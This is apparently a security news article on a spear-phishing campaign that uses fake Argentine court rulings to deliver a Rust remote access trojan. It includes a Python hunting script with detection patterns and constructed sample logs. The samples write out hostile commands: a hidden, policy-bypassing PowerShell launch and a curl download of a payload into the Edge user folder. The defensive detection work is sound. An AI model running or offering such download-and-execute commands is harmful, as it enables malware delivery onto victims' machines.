A sophisticated new spear-phishing campaign is targeting Argentina’s judicial sector, using authentic-looking federal court rulings as lures to deliver a Remote Access Trojan (RAT). Security researchers have identified this highly targeted operation, which chains several infection stages to gain persistent access to sensitive legal and institutional data.
The campaign begins with emails carrying a ZIP archive presented as an official judicial notice. Inside, recipients find a weaponized Windows shortcut (LNK) file disguised as a PDF, a batch-script loader, and a seemingly legitimate court resolution document. Double-clicking the fake PDF triggers the malicious execution chain while opening a convincing decoy document, so the victim sees nothing out of the ordinary.
Argentine Federal Court Rulings Used in Spear-Phishing Campaign
This social-engineering tactic is particularly effective against legal professionals who routinely handle official court documents. Seqrite analysts identified the campaign and detailed its multi-stage delivery mechanism, noting that the malware specifically targets entities within Argentina’s legal system, including judicial institutions, legal practitioners, and government bodies associated with the administration of justice.
The decoy document meticulously mimics authentic Argentine federal court resolutions. It features precise legal Spanish, appropriate case numbering, judicial signatures, and references to actual institutions such as the Tribunal Oral en lo Criminal y Correccional. This level of detail significantly enhances the campaign’s potential success rate among its intended victims.
Infection Mechanism: From Shortcut to RAT Deployment
The attack uses a three-stage infection process designed to evade detection. The initial weaponized LNK file launches PowerShell with a hidden window and the execution policy set to bypass; because PowerShell’s execution policy is a convenience setting rather than a security boundary, that single switch is enough to run the script unhindered. The PowerShell stage then runs the bundled batch script, which reaches out to infrastructure hosted on GitHub.
The batch script downloads a second-stage payload named “msedge_proxy.exe” and stores it in the Microsoft Edge user data directory so that it blends in with legitimate browser files. The final payload is a Rust-based Remote Access Trojan with extensive anti-analysis capabilities.
Before executing its main logic, the RAT performs environment checks for virtual machines, sandboxes, and debugging tools, and terminates immediately if any are found. Once operational, it establishes encrypted command-and-control communication, giving the attackers file exfiltration, installation of persistence mechanisms, credential harvesting, and the potential deployment of ransomware through modular DLL components.
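The delivery chain above (LNK launching hidden PowerShell, PowerShell running a batch loader, the loader fetching a file from GitHub, and an executable named msedge_proxy.exe landing in the Edge user data directory) maps cleanly onto process-creation telemetry. The following is an added hunting example written for this article, not code from Seqrite’s report or from the malware; the event records and the GitHub URL are constructed placeholders, the field names follow Sysmon Event ID 1, and the rule that treats the Edge Application folder as the only expected home of msedge_proxy.exe is an assumption about a standard Edge install.

```python
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class ProcEvent:
    """Minimal process-creation record (field names as in Sysmon Event ID 1)."""
    parent_image: str
    image: str
    command_line: str


# PowerShell accepts abbreviated switches, so match -w/-win/-WindowStyle Hidden
# and -ep/-ex/-exec/-ExecutionPolicy Bypass, case-insensitively.
HIDDEN_RE = re.compile(r"-w[a-z]*\s+hidden", re.I)
BYPASS_RE = re.compile(r"-e(?:p|x[a-z]*)\s+bypass", re.I)
BATCH_RE = re.compile(r"\.(?:bat|cmd)\b", re.I)
GITHUB_RE = re.compile(r"(?:raw\.githubusercontent\.com|github\.com)/", re.I)
DOWNLOADER_RE = re.compile(r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString", re.I)
DOWNLOADER_IMAGES = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
# Any executable stored under the Edge *User Data* tree is out of place.
EDGE_USERDATA_RE = re.compile(r"\\Microsoft\\Edge\\User Data\\.*\.exe$", re.I)
# Assumption: a genuine msedge_proxy.exe lives under ...\Edge\Application\.
EDGE_APP_DIR_RE = re.compile(r"\\Microsoft\\Edge\\Application\\(?:[\d.]+\\)?msedge_proxy\.exe$", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> List[str]:
    """Return the names of every chain stage this single event matches."""
    hits: List[str] = []
    img, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.command_line
    if parent == "explorer.exe" and img == "powershell.exe" \
            and HIDDEN_RE.search(cmd) and BYPASS_RE.search(cmd):
        hits.append("stage1_lnk_hidden_powershell")   # shortcut double-clicked from Explorer
    if parent == "powershell.exe" and img == "cmd.exe" and BATCH_RE.search(cmd):
        hits.append("stage2_batch_loader")
    if GITHUB_RE.search(cmd) and (DOWNLOADER_RE.search(cmd) or img in DOWNLOADER_IMAGES):
        hits.append("stage2_github_download")
    if EDGE_USERDATA_RE.search(ev.image):
        hits.append("stage3_exe_in_edge_user_data")
    if img == "msedge_proxy.exe" and not EDGE_APP_DIR_RE.search(ev.image):
        hits.append("stage3_msedge_proxy_outside_edge_app")
    return hits


def hunt(events: List[ProcEvent]) -> Dict[str, List[str]]:
    """Map each triggered rule to the command lines that triggered it."""
    findings: Dict[str, List[str]] = {}
    for ev in events:
        for rule in classify(ev):
            findings.setdefault(rule, []).append(ev.command_line)
    return findings


def chain_detected(events: List[ProcEvent], min_stages: int = 2) -> bool:
    """True when at least min_stages distinct stages of the chain appear."""
    stages = {rule.split("_")[0] for rule in hunt(events)}
    return len(stages) >= min_stages


# Constructed sample telemetry for the chain described in the article (not real logs).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
DROP = r"C:\Users\ana\AppData\Local\Microsoft\Edge\User Data\msedge_proxy.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              r'powershell.exe -w hidden -ep bypass -c "cmd /c loader.bat"'),
    ProcEvent(PS, CMD, r'"C:\Windows\System32\cmd.exe" /c C:\Users\ana\AppData\Local\Temp\Resolucion\loader.bat'),
    ProcEvent(CMD, r"C:\Windows\System32\curl.exe",
              'curl -s -L -o "' + DROP + '" https://raw.githubusercontent.com/<account>/<repo>/main/stage2'),
    ProcEvent(CMD, DROP, '"' + DROP + '"'),
]
# Constructed benign events: an interactive console and Edge's own msedge_proxy.exe.
EDGE_APP = r"C:\Program Files (x86)\Microsoft\Edge\Application"
BENIGN_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS, "powershell.exe -NoProfile"),
    ProcEvent(EDGE_APP + r"\msedge.exe", EDGE_APP + r"\msedge_proxy.exe",
              '"' + EDGE_APP + r'\msedge_proxy.exe" --profile-directory=Default'),
]

if __name__ == "__main__":
    for rule, lines in hunt(SAMPLE_EVENTS).items():
        print(rule, "->", lines)
    print("chain detected:", chain_detected(SAMPLE_EVENTS))
    print("benign flagged:", hunt(BENIGN_EVENTS))
```

Each rule on its own is noisy (plenty of admin scripts run PowerShell with a bypassed execution policy), which is why chain_detected only fires when two or more distinct stages appear in the same batch of events; in practice the batch would be scoped to one host and a short time window. The rule that matters most is the last one: msedge_proxy.exe is a real Edge component, so the signal is not the file name but a copy of it living anywhere other than the Edge Application folder, and in particular under User Data, which should never contain executables.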
The discovery of this campaign highlights the continuing sophistication of threats aimed at government and justice-sector entities. The combination of convincing official documents and layered evasion techniques underscores the need for heightened vigilance and robust defences within the judicial sector. Organizations are advised to reinforce staff training on recognizing phishing lures, to treat shortcut (LNK) files delivered inside email archives as suspect by default, and to deploy detection that catches the behaviours of the infection chain rather than relying on the lure document alone.